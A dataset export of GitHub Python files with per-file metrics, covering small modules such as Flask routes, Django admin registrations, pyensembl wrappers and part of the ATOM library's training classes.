| 0.306306
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114286
| 140
| 6
| 33
| 23.333333
| 0.895161
| 0.185714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
81011236161b8d80d2f643a5043c6fc06e19bb35
| 208
|
py
|
Python
|
pleque/core/__init__.py
|
kripnerl/pleque
|
af351c4aa4a40aa5bb5bdaa8083575344c0827e2
|
[
"MIT"
] | 13
|
2018-11-08T11:59:37.000Z
|
2022-03-14T20:17:38.000Z
|
pleque/core/__init__.py
|
kripnerl/pleque
|
af351c4aa4a40aa5bb5bdaa8083575344c0827e2
|
[
"MIT"
] | 18
|
2018-07-31T12:17:37.000Z
|
2020-05-19T08:36:42.000Z
|
pleque/core/__init__.py
|
kripnerl/pleque
|
af351c4aa4a40aa5bb5bdaa8083575344c0827e2
|
[
"MIT"
] | 3
|
2018-08-26T07:50:04.000Z
|
2021-12-03T11:44:57.000Z
|
from .coordinates import Coordinates
from .fluxfunctions import FluxFunctions
from .fluxsurface import Surface, FluxSurface
from .surfacefunctions import SurfaceFunctions
from .equilibrium import Equilibrium
| 34.666667
| 46
| 0.870192
| 21
| 208
| 8.619048
| 0.380952
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.100962
| 208
| 5
| 47
| 41.6
| 0.967914
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
8121d0d1292de21475421123d6ef16c334017d6b
| 19
|
py
|
Python
|
flask-service/db_base.py
|
lifefloating/flask-classic
|
898c669bb126fc7dac05f1c0309d47a8d6564d5d
|
[
"MIT"
] | 1
|
2020-10-21T08:35:35.000Z
|
2020-10-21T08:35:35.000Z
|
flask-service/db_base.py
|
lifefloating/flask-classic
|
898c669bb126fc7dac05f1c0309d47a8d6564d5d
|
[
"MIT"
] | null | null | null |
flask-service/db_base.py
|
lifefloating/flask-classic
|
898c669bb126fc7dac05f1c0309d47a8d6564d5d
|
[
"MIT"
] | null | null | null |
# Database layer placeholder: MySQL or MongoDB backend to be added.
| 19
| 19
| 0.631579
| 3
| 19
| 4
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 19
| 1
| 19
| 19
| 0.8
| 0.894737
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 5
|
8143d175c42ca16e951019abf18a439375d1cb52
| 117
|
py
|
Python
|
__init__.py
|
SmartMobilityAlgorithms/utilities
|
1c7125b941d8d60ec656c3b28e3836d614d2dead
|
[
"Apache-2.0"
] | null | null | null |
__init__.py
|
SmartMobilityAlgorithms/utilities
|
1c7125b941d8d60ec656c3b28e3836d614d2dead
|
[
"Apache-2.0"
] | null | null | null |
__init__.py
|
SmartMobilityAlgorithms/utilities
|
1c7125b941d8d60ec656c3b28e3836d614d2dead
|
[
"Apache-2.0"
] | 1
|
2022-01-24T17:17:07.000Z
|
2022-01-24T17:17:07.000Z
|
import sys

try:
    # When running inside Google Colab, make the bundled utilities importable.
    import google.colab  # noqa: F401
    sys.path.insert(0, "/content/Utilities")
except ImportError:
    # Not on Colab; leave sys.path untouched. The original bare `except:`
    # also swallowed SystemExit/KeyboardInterrupt and unrelated errors.
    pass
from .src import *
| 11.7
| 42
| 0.700855
| 17
| 117
| 4.823529
| 0.823529
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010417
| 0.179487
| 117
| 9
| 43
| 13
| 0.84375
| 0
| 0
| 0
| 0
| 0
| 0.153846
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.142857
| 0.428571
| 0
| 0.428571
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
|
0
| 5
|
d48e5f625431268fe6a3447f1d6068c2303205ee
| 59
|
py
|
Python
|
trac/trac/timeline/tests/__init__.py
|
HelionDevPlatform/bloodhound
|
206b0d9898159fa8297ad1e407d38484fa378354
|
[
"Apache-2.0"
] | 84
|
2015-01-07T03:42:53.000Z
|
2022-01-10T11:57:30.000Z
|
trac/trac/timeline/tests/__init__.py
|
HelionDevPlatform/bloodhound
|
206b0d9898159fa8297ad1e407d38484fa378354
|
[
"Apache-2.0"
] | 1
|
2021-11-04T12:52:03.000Z
|
2021-11-04T12:52:03.000Z
|
trac/trac/timeline/tests/__init__.py
|
HelionDevPlatform/bloodhound
|
206b0d9898159fa8297ad1e407d38484fa378354
|
[
"Apache-2.0"
] | 35
|
2015-01-06T11:30:27.000Z
|
2021-11-10T16:34:52.000Z
|
from trac.timeline.tests.functional import functionalSuite
| 29.5
| 58
| 0.881356
| 7
| 59
| 7.428571
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067797
| 59
| 1
| 59
| 59
| 0.945455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
be074d91dc9aaeb00117674431c6ee61031e9a98
| 581
|
py
|
Python
|
test/test.py
|
shervin-glitch/PyScriptTools
|
338fe08e26e7032f074006b450d3fdcea9d50934
|
[
"MIT"
] | 3
|
2022-01-15T19:00:47.000Z
|
2022-01-21T13:08:16.000Z
|
test/test.py
|
shervin-glitch/PyScriptTools
|
338fe08e26e7032f074006b450d3fdcea9d50934
|
[
"MIT"
] | null | null | null |
test/test.py
|
shervin-glitch/PyScriptTools
|
338fe08e26e7032f074006b450d3fdcea9d50934
|
[
"MIT"
] | null | null | null |
""" Single Importation """
import PyScriptTools
""" Package Meta Data """
from PyScriptTools import MetaData
""" Package Classes """
from PyScriptTools import CPUTools
from PyScriptTools import GPUTools
from PyScriptTools import RAMTools
from PyScriptTools import DiskTools
from PyScriptTools import OtherTools
from PyScriptTools import SystemTools
from PyScriptTools import NetworkTools
""" Package Modules """
from PyScriptTools import validators # or from PyScriptTools.validators import *
from PyScriptTools import exceptions # or from PyScriptTools.exceptions import *
| 27.666667
| 81
| 0.814114
| 61
| 581
| 7.754098
| 0.344262
| 0.43129
| 0.486258
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.134251
| 581
| 21
| 82
| 27.666667
| 0.940358
| 0.182444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
be2ba7acfc6a6948febd6f16293d0df1bef8525f
| 137
|
py
|
Python
|
example/sample_app/admin.py
|
natgeosociety/django-formfield
|
de6c39876d004045e86e6e76ff45df43bcc31b8b
|
[
"Apache-2.0"
] | 16
|
2015-01-09T07:02:27.000Z
|
2019-08-18T03:10:38.000Z
|
example/sample_app/admin.py
|
natgeosociety/django-formfield
|
de6c39876d004045e86e6e76ff45df43bcc31b8b
|
[
"Apache-2.0"
] | 8
|
2015-12-07T14:51:53.000Z
|
2020-04-18T10:00:35.000Z
|
example/sample_app/admin.py
|
natgeosociety/django-formfield
|
de6c39876d004045e86e6e76ff45df43bcc31b8b
|
[
"Apache-2.0"
] | 3
|
2016-01-25T22:40:43.000Z
|
2018-04-19T19:03:34.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from django.contrib import admin
from .models import Person
admin.site.register(Person)
| 15.222222
| 32
| 0.715328
| 20
| 137
| 4.9
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008475
| 0.138686
| 137
| 8
| 33
| 17.125
| 0.822034
| 0.306569
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
07c7a25506d34a7174eb5c5154dcc8d17caf124f
| 155
|
py
|
Python
|
certmgr/scripts/cert_renewal_hook.py
|
sillsdev/TheCombine
|
d8f87c464c5a770019d55eefb3dc6a276ab9da13
|
[
"MIT"
] | 14
|
2019-06-14T23:18:04.000Z
|
2021-09-04T03:28:32.000Z
|
certmgr/scripts/cert_renewal_hook.py
|
sillsdev/TheCombine
|
d8f87c464c5a770019d55eefb3dc6a276ab9da13
|
[
"MIT"
] | 1,114
|
2019-06-05T15:40:26.000Z
|
2022-03-29T16:07:37.000Z
|
certmgr/scripts/cert_renewal_hook.py
|
sillsdev/TheCombine
|
d8f87c464c5a770019d55eefb3dc6a276ab9da13
|
[
"MIT"
] | 9
|
2019-07-31T13:41:15.000Z
|
2021-12-06T16:50:02.000Z
|
#!/usr/bin/env python3
"""Push updated certificates to AWS S3 bucket."""
from aws import aws_push_certs
# Push the certificates to AWS S3 when executed as a script.
if __name__ == "__main__":
    aws_push_certs()
| 17.222222
| 49
| 0.716129
| 23
| 155
| 4.304348
| 0.73913
| 0.141414
| 0.242424
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.015385
| 0.16129
| 155
| 8
| 50
| 19.375
| 0.746154
| 0.419355
| 0
| 0
| 0
| 0
| 0.095238
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 5
|
07e9100b76fba4e9dad294c4b62ed6526c662f46
| 212
|
py
|
Python
|
nautilus/auth/models/userPassword.py
|
AlecAivazis/python
|
70e2acef27a2f87355590be1a6ca60ce3ab4d09c
|
[
"MIT"
] | 9
|
2019-02-17T01:33:43.000Z
|
2022-02-03T02:14:12.000Z
|
nautilus/auth/models/userPassword.py
|
AlecAivazis/python
|
70e2acef27a2f87355590be1a6ca60ce3ab4d09c
|
[
"MIT"
] | 59
|
2016-03-14T15:55:50.000Z
|
2016-07-17T15:22:56.000Z
|
nautilus/auth/models/userPassword.py
|
AlecAivazis/python
|
70e2acef27a2f87355590be1a6ca60ce3ab4d09c
|
[
"MIT"
] | 3
|
2017-08-03T20:18:59.000Z
|
2018-07-18T02:03:41.000Z
|
# local imports
from nautilus.models import fields, BaseModel
from .mixins import HasPassword
class UserPassword(HasPassword, BaseModel):
    """Model linking a password (via the HasPassword mixin) to a remote user.

    The unique constraint means at most one password record per user entry.
    """
    user = fields.CharField(unique=True)  # points to a remote user entry
| 30.285714
| 72
| 0.792453
| 27
| 212
| 6.222222
| 0.777778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.141509
| 212
| 6
| 73
| 35.333333
| 0.923077
| 0.20283
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.5
| 0.5
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 5
|
ed029aa0f8161b3133da50fd8faed0e794092442
| 792
|
py
|
Python
|
src/dohlee/hg38.py
|
dohlee/python-dohlee
|
55e77591fe1e604c602bd8ab2bfaa8bd0277af54
|
[
"MIT"
] | 1
|
2020-02-12T18:45:41.000Z
|
2020-02-12T18:45:41.000Z
|
src/dohlee/hg38.py
|
dohlee/python-dohlee
|
55e77591fe1e604c602bd8ab2bfaa8bd0277af54
|
[
"MIT"
] | null | null | null |
src/dohlee/hg38.py
|
dohlee/python-dohlee
|
55e77591fe1e604c602bd8ab2bfaa8bd0277af54
|
[
"MIT"
] | null | null | null |
from pyensembl import EnsemblRelease
ENSEMBL_RELEASE_VERSION = 87
def gene_by_id(*args, **kwargs):
    """Delegate to EnsemblRelease.gene_by_id on the pinned release."""
    release = EnsemblRelease(ENSEMBL_RELEASE_VERSION)
    return release.gene_by_id(*args, **kwargs)
def genes_by_name(*args, **kwargs):
    """Delegate to EnsemblRelease.genes_by_name on the pinned release."""
    release = EnsemblRelease(ENSEMBL_RELEASE_VERSION)
    return release.genes_by_name(*args, **kwargs)
def genes_at_locus(*args, **kwargs):
    """Delegate to EnsemblRelease.genes_at_locus on the pinned release."""
    release = EnsemblRelease(ENSEMBL_RELEASE_VERSION)
    return release.genes_at_locus(*args, **kwargs)
def gene_names_at_locus(*args, **kwargs):
    """Delegate to EnsemblRelease.gene_names_at_locus on the pinned release."""
    release = EnsemblRelease(ENSEMBL_RELEASE_VERSION)
    return release.gene_names_at_locus(*args, **kwargs)
def symbol2ensg(*args):
    """Map a gene symbol to the first matching Ensembl gene id."""
    release = EnsemblRelease(ENSEMBL_RELEASE_VERSION)
    gene_ids = release.gene_ids_of_gene_name(*args)
    return gene_ids[0]
| 27.310345
| 55
| 0.733586
| 99
| 792
| 5.525253
| 0.252525
| 0.146252
| 0.30713
| 0.383912
| 0.820841
| 0.680073
| 0.6234
| 0.6234
| 0.519196
| 0.519196
| 0
| 0.006033
| 0.162879
| 792
| 28
| 56
| 28.285714
| 0.819005
| 0
| 0
| 0.294118
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.294118
| false
| 0
| 0.058824
| 0
| 0.647059
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 5
|
ed1ea9baa7012dfe7cb4c78bace20352bff8d2f3
| 622
|
py
|
Python
|
app/routes.py
|
jsford/cameracalibrator
|
a260a3af4c459208de8c2eaca4dc02c90938fc0e
|
[
"MIT"
] | null | null | null |
app/routes.py
|
jsford/cameracalibrator
|
a260a3af4c459208de8c2eaca4dc02c90938fc0e
|
[
"MIT"
] | null | null | null |
app/routes.py
|
jsford/cameracalibrator
|
a260a3af4c459208de8c2eaca4dc02c90938fc0e
|
[
"MIT"
] | null | null | null |
from app import app
from flask import render_template, flash, redirect, url_for, request, send_from_directory, jsonify
import os
@app.route('/')
@app.route('/index')
def index():
    """Serve the main page from the index.html template."""
    return render_template('index.html')
@app.route('/stereo')
def stereo():
    """Serve the stereo page from the stereo.html template."""
    return render_template('stereo.html')
@app.route('/patterns')
def patterns():
    """Serve the patterns page with the title 'Pattern Generator'."""
    return render_template('patterns.html', title='Pattern Generator')
@app.route('/about')
def about():
    """Serve the about page from the about.html template."""
    return render_template('about.html')
@app.route('/favicon')
def favicon():
    """Serve favicon.ico from the static images directory."""
    image_dir = os.path.join(app.root_path, 'static', 'images')
    return send_from_directory(image_dir, 'favicon.ico')
| 24.88
| 98
| 0.717042
| 84
| 622
| 5.178571
| 0.392857
| 0.110345
| 0.183908
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115756
| 622
| 24
| 99
| 25.916667
| 0.790909
| 0
| 0
| 0
| 0
| 0
| 0.194534
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.263158
| true
| 0
| 0.157895
| 0.263158
| 0.684211
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 5
|
ed34e7be86a6c5e8bc6c7592e059017b2c8ccbe0
| 40
|
py
|
Python
|
complex/complex/errors.py
|
hazmat345/example-plugins
|
68551c5327bdbb45870a2a5c121ee99d2673682b
|
[
"MIT"
] | null | null | null |
complex/complex/errors.py
|
hazmat345/example-plugins
|
68551c5327bdbb45870a2a5c121ee99d2673682b
|
[
"MIT"
] | 4
|
2018-08-17T21:10:07.000Z
|
2022-02-08T17:47:30.000Z
|
complex/complex/errors.py
|
hazmat345/example-plugins
|
68551c5327bdbb45870a2a5c121ee99d2673682b
|
[
"MIT"
] | 3
|
2021-03-23T14:18:54.000Z
|
2021-12-15T17:08:48.000Z
|
class StartupError(Exception):
    """Signals a failure during startup."""
| 13.333333
| 30
| 0.75
| 4
| 40
| 7.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.175
| 40
| 2
| 31
| 20
| 0.909091
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0
| 0
| 0.5
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
|
0
| 5
|
ed58368f0714e5283ef2b5392bd9fc869f1b918a
| 166
|
py
|
Python
|
projects/admin.py
|
Michellemukami/portfolio1
|
8c661112a43664e0b8f3b89d08b5052523c5e4c3
|
[
"MIT"
] | null | null | null |
projects/admin.py
|
Michellemukami/portfolio1
|
8c661112a43664e0b8f3b89d08b5052523c5e4c3
|
[
"MIT"
] | 5
|
2020-06-05T22:54:41.000Z
|
2021-09-08T01:17:21.000Z
|
projects/admin.py
|
Michellemukami/portfolio1
|
8c661112a43664e0b8f3b89d08b5052523c5e4c3
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Project
# Register your models here.
class ProjectAdmin(admin.ModelAdmin):
    """Admin options for the Project model (defaults only for now)."""

# Bug fix: the original called admin.site.register(Project) *inside* the class
# body, which registered Project with the default ModelAdmin and left
# ProjectAdmin itself unused. Register the model with its admin class instead.
admin.site.register(Project, ProjectAdmin)
| 20.75
| 37
| 0.777108
| 21
| 166
| 6.142857
| 0.666667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.150602
| 166
| 8
| 38
| 20.75
| 0.914894
| 0.156627
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 5
|
ed81e0aae0e176fccaee25b1bcf42ad01708682e
| 17,556
|
py
|
Python
|
atom/training.py
|
tvdboom/AutoML
|
ee8432577520cb3f54578e8ef1e8496f95cffc03
|
[
"MIT"
] | null | null | null |
atom/training.py
|
tvdboom/AutoML
|
ee8432577520cb3f54578e8ef1e8496f95cffc03
|
[
"MIT"
] | null | null | null |
atom/training.py
|
tvdboom/AutoML
|
ee8432577520cb3f54578e8ef1e8496f95cffc03
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Automated Tool for Optimized Modelling (ATOM)
Author: Mavs
Description: Module containing the training classes.
"""
from copy import copy
from typing import Optional, Union
import numpy as np
import pandas as pd
from sklearn.base import BaseEstimator
from typeguard import typechecked
from atom.basetrainer import BaseTrainer
from atom.plots import BaseModelPlotter
from atom.utils import (
INT, SEQUENCE_TYPES, CustomDict, composed, crash, get_best_score,
infer_task, lst, method_to_log,
)
class Direct(BaseEstimator, BaseTrainer, BaseModelPlotter):
    """Direct training approach.
    Fit and evaluate over the models. Contrary to SuccessiveHalving
    and TrainSizing, the direct approach only iterates once over the
    models, using the full dataset.
    See basetrainer.py for a description of the parameters.
    """
    def __init__(
        self, models, metric, greater_is_better, needs_proba, needs_threshold,
        n_calls, n_initial_points, est_params, bo_params, n_bootstrap, n_jobs,
        verbose, warnings, logger, experiment, gpu, random_state,
    ):
        # Nothing is stored here; every parameter is handled by BaseTrainer.
        super().__init__(
            models, metric, greater_is_better, needs_proba, needs_threshold,
            n_calls, n_initial_points, est_params, bo_params, n_bootstrap,
            n_jobs, verbose, warnings, logger, experiment, gpu, random_state,
        )
    @composed(crash, method_to_log)
    def run(self, *arrays):
        """Run the trainer.
        Parameters
        ----------
        *arrays: sequence of indexables
            Training set and test set. Allowed formats are:
            - train, test
            - X_train, X_test, y_train, y_test
            - (X_train, y_train), (X_test, y_test)
        """
        # Unpack the parsed arrays, infer the ML task, then do a single
        # training pass over all models with the full dataset.
        data, idx, holdout = self._get_data(arrays)
        self.branch._data = data
        self.branch._idx = idx
        self.holdout = holdout
        self.task = infer_task(self.y_train, goal=self.goal)
        self._prepare_parameters()
        self._core_iteration()
class SuccessiveHalving(BaseEstimator, BaseTrainer, BaseModelPlotter):
    """Successive halving training approach.
    The successive halving technique is a bandit-based algorithm that
    fits N models to 1/N of the data. The best half are selected to
    go to the next iteration where the process is repeated. This
    continues until only one model remains, which is fitted on the
    complete dataset. Beware that a model's performance can depend
    greatly on the amount of data on which it is trained. For this
    reason, it is recommended to only use this technique with similar
    models, e.g. only using tree-based models.
    See basetrainer.py for a description of the remaining parameters.
    Parameters
    ----------
    skip_runs: int, optional (default=0)
        Skip last `skip_runs` runs of the successive halving.
    """
    def __init__(
        self, models, metric, greater_is_better, needs_proba, needs_threshold,
        skip_runs, n_calls, n_initial_points, est_params, bo_params, n_bootstrap,
        n_jobs, verbose, warnings, logger, experiment, gpu, random_state,
    ):
        # skip_runs is the only parameter specific to this trainer; the rest
        # are forwarded unchanged to BaseTrainer.
        self.skip_runs = skip_runs
        super().__init__(
            models, metric, greater_is_better, needs_proba, needs_threshold,
            n_calls, n_initial_points, est_params, bo_params, n_bootstrap,
            n_jobs, verbose, warnings, logger, experiment, gpu, random_state,
        )
    @composed(crash, method_to_log)
    def run(self, *arrays):
        """Run the trainer.
        Parameters
        ----------
        *arrays: sequence of indexables
            Training set and test set. Allowed formats are:
            - train, test
            - X_train, X_test, y_train, y_test
            - (X_train, y_train), (X_test, y_test)
        Raises
        ------
        ValueError
            If skip_runs is negative or leaves fewer than one run.
        """
        self.branch._data, self.branch._idx, self.holdout = self._get_data(arrays)
        self.task = infer_task(self.y_train, goal=self.goal)
        self._prepare_parameters()
        if self.skip_runs < 0:
            # Bug fix: the two adjacent string literals previously rendered as
            # "...parameter.Value should..." (missing space between sentences).
            raise ValueError(
                "Invalid value for the skip_runs parameter. "
                f"Value should be >=0, got {self.skip_runs}."
            )
        elif self.skip_runs >= len(self._models) // 2 + 1:
            raise ValueError(
                "Invalid value for the skip_runs parameter. Less than "
                f"1 run remaining, got n_runs={len(self._models) // 2 + 1} "
                f"and skip_runs={self.skip_runs}."
            )
        run = 0
        models = CustomDict()  # Accumulates every fitted model across runs
        # Pristine copies so each halving round restarts from unfitted models.
        og_models = {k: copy(v) for k, v in self._models.items()}
        while len(self._models) > 2 ** self.skip_runs - 1:
            # Create the new set of models for the run
            for m in self._models.values():
                m.name += str(len(self._models))  # Suffix marks the run size
                m._pred = [None] * 15  # Avoid shallow copy
                m._train_idx = len(self.train) // len(self._models)
            # Print stats for this subset of the data
            p = round(100.0 / len(self._models))
            self.log(f"\n\nRun: {run} {'='*32} >>", 1)
            self.log(f"Models: {', '.join(lst(self.models))}", 1)
            self.log(f"Size of training set: {len(self.train)} ({p}%)", 1)
            self.log(f"Size of test set: {len(self.test)}", 1)
            self._core_iteration()
            models.update({m.name: m for m in self._models.values()})
            # Select next models for halving: keep the best-scoring half.
            best = pd.Series(
                data=[get_best_score(m) for m in self._models.values()],
                index=[m.name for m in self._models.values()],
            ).nlargest(n=len(self._models) // 2, keep="first")
            names = [m.acronym for m in self._models.values() if m.name in best.index]
            self._models = CustomDict(
                {k: copy(v) for k, v in og_models.items() if v.acronym in names}
            )
            run += 1
        self._models = models  # Restore all models
class TrainSizing(BaseEstimator, BaseTrainer, BaseModelPlotter):
    """Train Sizing training approach.
    When training models, there is usually a trade-off between model
    performance and computation time, that is regulated by the number
    of samples in the training set. This class can be used to create
    insights in this trade-off, and help determine the optimal size of
    the training set. The models are fitted multiple times,
    ever-increasing the number of samples in the training set.
    See basetrainer.py for a description of the remaining parameters.
    Parameters
    ----------
    train_sizes: int or sequence, optional (default=5)
        Sequence of training set sizes used to run the trainings.
        - If int: Number of equally distributed splits, i.e. for a
          value N it's equal to np.linspace(1.0/N, 1.0, N).
        - If sequence: Fraction of the training set when <=1, else
          total number of samples.
    """
    def __init__(
        self, models, metric, greater_is_better, needs_proba, needs_threshold,
        train_sizes, n_calls, n_initial_points, est_params, bo_params, n_bootstrap,
        n_jobs, verbose, warnings, logger, experiment, gpu, random_state
    ):
        # train_sizes is the only parameter specific to this trainer; the rest
        # are forwarded unchanged to BaseTrainer.
        self.train_sizes = train_sizes
        super().__init__(
            models, metric, greater_is_better, needs_proba, needs_threshold,
            n_calls, n_initial_points, est_params, bo_params, n_bootstrap,
            n_jobs, verbose, warnings, logger, experiment, gpu, random_state,
        )
    @composed(crash, method_to_log)
    def run(self, *arrays):
        """Run the trainer.
        Parameters
        ----------
        *arrays: sequence of indexables
            Training set and test set. Allowed formats are:
            - train, test
            - X_train, X_test, y_train, y_test
            - (X_train, y_train), (X_test, y_test)
        """
        self.branch._data, self.branch._idx, self.holdout = self._get_data(arrays)
        self.task = infer_task(self.y_train, goal=self.goal)
        self._prepare_parameters()
        # Convert integer train_sizes to sequence
        if isinstance(self.train_sizes, int):
            self.train_sizes = np.linspace(1 / self.train_sizes, 1.0, self.train_sizes)
        models = CustomDict()  # Accumulates every fitted model across runs
        # Pristine copies so each run restarts from unfitted models.
        og_models = {k: copy(v) for k, v in self._models.items()}
        for run, size in enumerate(self.train_sizes):
            # Select fraction of data to use in this run
            if size <= 1:
                # size is a fraction of the training set
                frac = round(size, 2)
                train_idx = int(size * len(self.branch.train))
            else:
                # size is an absolute number of samples
                frac = round(size / len(self.branch.train), 2)
                train_idx = size
            for m in self._models.values():
                m.name += str(frac).replace(".", "")  # Add frac to the name
                m._pred = [None] * 15  # Avoid shallow copy
                m._train_idx = train_idx
            # Print stats for this subset of the data
            p = round(train_idx * 100.0 / len(self.branch.train))
            self.log(f"\n\nRun: {run} {'='*32} >>", 1)
            self.log(f"Size of training set: {train_idx} ({p}%)", 1)
            self.log(f"Size of test set: {len(self.test)}", 1)
            self._core_iteration()
            # NOTE(review): keys are lowercased here but SuccessiveHalving.run
            # uses m.name unchanged — confirm the asymmetry is intended.
            models.update({m.name.lower(): m for m in self._models.values()})
            # Create next models for sizing
            self._models = CustomDict({k: copy(v) for k, v in og_models.items()})
        self._models = models  # Restore original models
class DirectClassifier(Direct):
    """Direct trainer for classification tasks."""
    @typechecked
    def __init__(
        self,
        models: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,
        metric: Optional[Union[str, callable, SEQUENCE_TYPES]] = None,
        greater_is_better: Union[bool, SEQUENCE_TYPES] = True,
        needs_proba: Union[bool, SEQUENCE_TYPES] = False,
